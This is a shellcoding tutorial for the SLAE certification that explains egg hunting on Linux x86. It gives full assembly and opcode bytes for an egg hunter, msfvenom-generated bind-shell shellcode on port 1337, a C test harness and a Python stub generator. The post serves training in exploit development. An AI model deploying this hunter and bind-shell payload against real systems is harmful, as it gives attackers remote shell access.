SLAE 3: Egg hunting in Linux x86 Assembly
Programming / January 22, 2020 • 10 min read
Tags: slae shellcoding
When writing exploits, you sometimes encounter a situation where your payload is too big, you can’t fit your payload inside the buffer. This is where “eggs” come in to play. The basic idea of egg hunting is to divide the payload in to two parts, part one is the hunter while part two is the hunted (the egg). The hunter is a set of instructions that searches the program’s virtual address space for a given pattern (the egg). Once it is found, the hunter will jump to the payload following the egg.
The egg can sometimes be referred to as key, tag or pattern. Throughout this article, if any of those terms are used, remember that they all mean the same thing.
The payload is formatted as <egg><egg><shellcode>
. The egg is specified twice in order to reduce collisions. If your egg is only four bytes, it could be possible that there exists an instruction that is the same as your egg. Another possibility is that you encounter the egg that you have instructed to look for. Therefore, if you specify the egg twice, you can be sure that is the real egg.
Before continuing this article, I will briefly try to explain a few concepts needed for understanding how egg hunting works. If you already know all about page sizes and virtual address spaces, feel free to skip to Hunting time.
When researching about egg hunters, I stumbled upon this paper http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf written by skape back in 2004. Much of this article is based on this paper.
Virtual Address Space
The purpose of an egg hunter is to search for a given key. The program that searches for this key will search virtual address space (VAS) of a given process. This process is usually the process which your payload gets injected into.
Before I explain what the VAS is, let’s look at the memory layout of a linux process. Table 1 visualizes how the memory layout looks like.
Process Memory layout |
---|
Kernel Space |
Stack |
Shared Libs + Mappings |
Heap |
BSS |
Data |
Text |
Table 1: Memory layout of a process
This is how programs are structured. For example, the Text
segment contains the assembly instructions, the Data
segment contains initialized global and static variables, and the BSS
segment contains uninitialized variables.
However, these segments can be spread out when looking at the physical memory address space, meaning the RAM. So how does your operating system know where a segment is and which segments belongs to the correct process? You most likely have multiple programs running at any given time.
This is where the virtual address space comes into play. When you start a process, your operating system assigns a virtual address space for your process. Not only does this isolate the process from other running processes, it also tricks the process into thinking that there only exists one space and that the process occupies it. This can be visualized in figure 1:
Figure 1: Virtual address space vs Physical address space. [1]
The CPU will in turn convert a virtual address to a physical address in order to perform its operations. But wait! There’s more :) To make things easier, the virtual and physical address space is further divided into pages
. More on this in the next section.
Pages of memory
A page refers to a block of memory of a predefined size. In Linux, it is possible to obtain the page size by running getconf PAGE_SIZE
. On most x86 Linux systems, the page size is 4096 bytes. Why does this matter for an egg hunter? Well, this information will greatly improve the performance of our search algorithm. Why, you may ask? When allocating memory, the OS will allocate blocks of PAGE_SIZE, which is 4096 bytes. The virtual addresses in each allocated page will be mapped to a physical address. However, there will be virtual addresses that are unmapped, these are invalid addresses. If we can easily skip invalid pages, meaning unmapped blocks of addresses, we can greatly reduce the search time. How this is done is explained in the next section.
Hunting time
Now it’s time to build our egg hunter!
The search algorithm for our hunter will look something like this (pseudo code):
egg = "0x41424344"*2
pages = page[]
found = ""
for page in pages:
if page is readable:
for address in page:
if address.startswith(egg)
# found the egg
found = address
break
jump.to(found+8)
To summarize our algorithm:
- Iterate through each available page
- If page is valid, start comparing values in addresses with egg value. If page is invalid, go to step 1
- If egg is found, jump to [address+8] which is our shellcode
- If no egg is found, go to step 1
The Assembly
When reading skape’s paper, the author details a few methods for validating an address without crashing the program. One of those methods is using syscalls, specifically the access
syscall which checks a user’s permission for a given file.
The syscall number for access
can be found in /usr/include/i386-linux-gnu/asm/unistd_32.h
:
[...]
#define __NR_access 33
[...]
Let’s check what the man pages say about access()
ACCESS(2) Linux Programmer's Manual ACCESS(2)
NAME
access - check real user's permissions for a file
SYNOPSIS
#include <unistd.h>
int access(const char *pathname, int mode);
DESCRIPTION
access() checks whether the calling process can access the file pathname. If pathname is a symbolic link, it
is dereferenced.
The mode specifies the accessibility check(s) to be performed, and is either the value F_OK, or a mask con
sisting of the bitwise OR of one or more of R_OK, W_OK, and X_OK. F_OK tests for the existence of the file.
R_OK, W_OK, and X_OK test whether the file exists and grants read, write, and execute permissions, respec
tively.
[...]
RETURN VALUE
On success (all requested permissions granted), zero is returned. On error (at least one bit in mode asked
for a permission that is denied, or some other error occurred), -1 is returned, and errno is set appropri
ately.
ERRORS
access() shall fail if:
EACCES The requested access would be denied to the file, or search permission is denied for one of the direc
tories in the path prefix of pathname. (See also path_resolution(7).)
[...]
access() may fail if:
EFAULT pathname points outside your accessible address space.
[...]
The error code we are interested in is EFAULT
because it will indicate if the address that is being checked is valid or not, without crashing the program.
Let’s start writing code! The following section zeros out registers and places our egg in ebx:
1global _start
2
3section .text
4
5_start:
6 mov ebx, 0xdeadbeef ; 4 byte egg
7 xor ecx, ecx ; Zero out ecx
8 mul ecx ; edx, eax = eax * 0 -> Zero out edx and eax
Next part performs an OR operation between the lower-end of edx and 0xfff. This is equivalent of adding 0x1000 (PAGE_SIZE) to edx
1inc_page:
2 or dx, 0xfff ; PAGE_SIZE -> The OR operation gets the next page
Next we will perform a system call to access() with the first parameter being the address we want to check and the second parameter being 0. When performing syscalls, the registers can be used as following:
Register | Purpose |
---|---|
eax | System call number |
ebx | First parameter |
ecx | Second parameter |
edx | Third parameter |
esi | Fourth parameter |
edi | Fifth parameter |
1check_address:
2 inc edx ; Increment edx
3 pushad ; Preserve current registers by pushing them to the stack
4 lea ebx, [edx+4] ; Load the effective address at edx + 4 bytes
5 mov al, 0x21 ; __NR_access 33
6 int 0x80 ; Interrupt the kernel to run our syscall
The last part involves checking if we have found our egg or not. If don’t find we restart from the beginning until we find it.
1 cmp al, 0xf2 ; Check if we go error when reading addr in page
2 popad ; restore the original registers
3 jz inc_page ; If we got error, increment page and restart from the beginning
4
5 cmp [edx], ebx ; Does the value stored at $edx correspond to our egg?
6 jnz check_address ; If not, jump back to check_address and check the next address
7
8 cmp [edx+0x4], ebx ; Does the next 4 byte value also equal our egg? If so, we have found it!
9 jnz check_address ; If not, jump back to check_address and check the next address
10
11 lea ebx, [edx+0x8] ; Load the correct address containing the start of our shellcode
12 jmp ebx ; jump to shellcode!
I modified the code to load the effective address at [edx+8]
and jump to that once the egg has been found. This is because my egg is not executable, therefore I must jump directly to the shellcode. If a different egg was chosen that is executable, e.g. 0x50905090
, then this extra step could be skipped.
Final code
1global _start
2
3section .text
4
5_start:
6 mov ebx, 0xdeadbeef ; 4 byte egg
7 xor ecx, ecx ; Zero out ecx
8 mul ecx ; edx, eax = eax * 0 -> Zero out edx and eax
9
10inc_page:
11 or dx, 0xfff ; PAGE_SIZE -> The OR operation gets the next page
12
13check_address:
14 inc edx ; Increment edx
15 pushad ; Preserve current registers by pushing them to the stack
16 lea ebx, [edx+4] ; Load the effective address at edx + 4 bytes
17 mov al, 0x21 ; __NR_access 33
18 int 0x80 ; Interrupt the kernel to run our syscall
19
20 cmp al, 0xf2 ; Check if we go error when reading addr in page
21 popad ; restore the original registers
22 jz inc_page ; If we got error, increment page and restart from the beginning
23
24 cmp [edx], ebx ; Does the value stored at $edx correspond to our egg?
25 jnz check_address ; If not, jump back to check_address and check the next address
26
27 cmp [edx+0x4], ebx ; Does the next 4 byte value also equal our egg? If so, we have found it!
28 jnz check_address ; If not, jump back to check_address and check the next address
29
30 lea ebx, [edx+0x8] ; Load the correct address containing the start of our shellcode
31 jmp ebx ; jump to shellcode!
Testing our egg hunter!
In order to test our egg hunter, we can quickly generate some shellcode with msfvenom
:
dubs3c@slae:~$ msfvenom -p linux/x86/shell_bind_tcp lport=1337 -f c -a x86 --platform=linux
No encoder specified, outputting raw payload
Payload size: 78 bytes
Final size of c file: 354 bytes
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x05\x39\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";
Now we can create a program that will execute our egg hunter and hopefully find our shellcode generated by msfvenom. I have specified the egg twice as prefix to the shellcode \xef\xbe\xad\xde\xef\xbe\xad\xde
.
1#include<stdio.h>
2#include<string.h>
3
4unsigned char hunter[] = "\xbb\xef\xbe\xad\xde\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\x8d\x5a\x08\xff\xe3";
5
6unsigned char shellcode[] = \
7 "\xef\xbe\xad\xde\xef\xbe\xad\xde"
8 "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
9 "\x5b\x5e\x52\x68\x02\x00\x05\x39\x6a\x10\x51\x50\x89\xe1\x6a"
10 "\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
11 "\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
12 "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
13 "\x0b\xcd\x80";
14
15main()
16{
17
18 printf("Egg hunter length: %d\n", strlen(hunter));
19 printf("Shellcode length: %d\n", strlen(shellcode));
20 int (*ret)() = (int(*)())hunter;
21 ret();
22}
Compiling with gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
and running ./shellcode
yields the following result:
Yay it works!
Making the process configurable
I created a simple python script that would generate the stub which can then be compiled and executed.
1#!/usr/bin/env python3
2
3import sys
4
5
6def generate_stub(egg, shellcode):
7 stub = r"""
8#include<stdio.h>
9#include<string.h>
10
11unsigned char hunter[] = "\xbb{egg}\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\x8d\x5a\x08\xff\xe3";
12
13unsigned char shellcode[] = "{egg}{egg}{shellcode}";
14
15main()
16{
17
18 printf("Egg hunter length: %d\n", strlen(hunter));
19 printf("Shellcode length: %d\n", strlen(shellcode));
20
21 int (*ret)() = (int(*)())hunter;
22
23 ret();
24
25}
26"""
27 stub = stub.replace("{egg}", egg)
28 stub = stub.replace("{shellcode}", shellcode)
29 return stub
30
31
32def write_file(stub):
33 try:
34 with open("stub.c", "w") as f:
35 f.write(stub)
36 return True
37 except Exception as err:
38 print("[-] Could not create file stub.c. Error: {}".format(err))
39 return False
40
41
42def main(egg, shellcode):
43
44 payload = r"{egg}{egg}{shellcode}".format(egg=egg, shellcode=shellcode)
45
46 print("[+] Generating stub...")
47 stub = generate_stub(egg, shellcode)
48 err = write_file(stub)
49 if not err:
50 print("[-] Exiting...")
51 sys.exit(1)
52
53 print("[+] Done")
54 print("[+] Stub located at stub.c")
55 print("[+] Full payload: {}".format(shellcode))
56
57
58if __name__ == "__main__":
59 if len(sys.argv) < 3:
60 print("Usage: python3 wrapper.py <egg> <shellcode>")
61 sys.exit(0)
62
63 if len(sys.argv) == 3:
64 main(sys.argv[1], sys.argv[2])
The script can be used as following:
dubs3c@slae:~/SLAE/EXAM/github/assignment_3$ python3 wrapper.py "\xef\xbe\xad\xde" "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd
\x80\x5b\x5e\x52\x68\x02\x00\x05\x39\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93
\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
[+] Generating stub...
[+] Done
[+] Stub located at stub.c
[+] Full payload: \x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00\x05\x39\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
dubs3c@slae:~/SLAE/EXAM/github/assignment_3$ gcc -fno-stack-protector -z execstack stub.c -o stub
dubs3c@slae:~/SLAE/EXAM/github/assignment_3$ cat stub.c
#include<stdio.h>
#include<string.h>
unsigned char hunter[] = "\xbb\xef\xbe\xad\xde\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\x8d\x5a\x08\xff\xe3";
unsigned char shellcode[] = "\xef\xbe\xad\xde\xef\xbe\xad\xde\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00\x05\x39\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
main()
{
printf("Egg hunter length: %d\n", strlen(hunter));
printf("Shellcode length: %d\n", strlen(shellcode));
int (*ret)() = (int(*)())hunter;
ret();
}
Easy Peasy :)
References
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
https://www.pentesteracademy.com/course?id=3
Student ID: SLAE-1490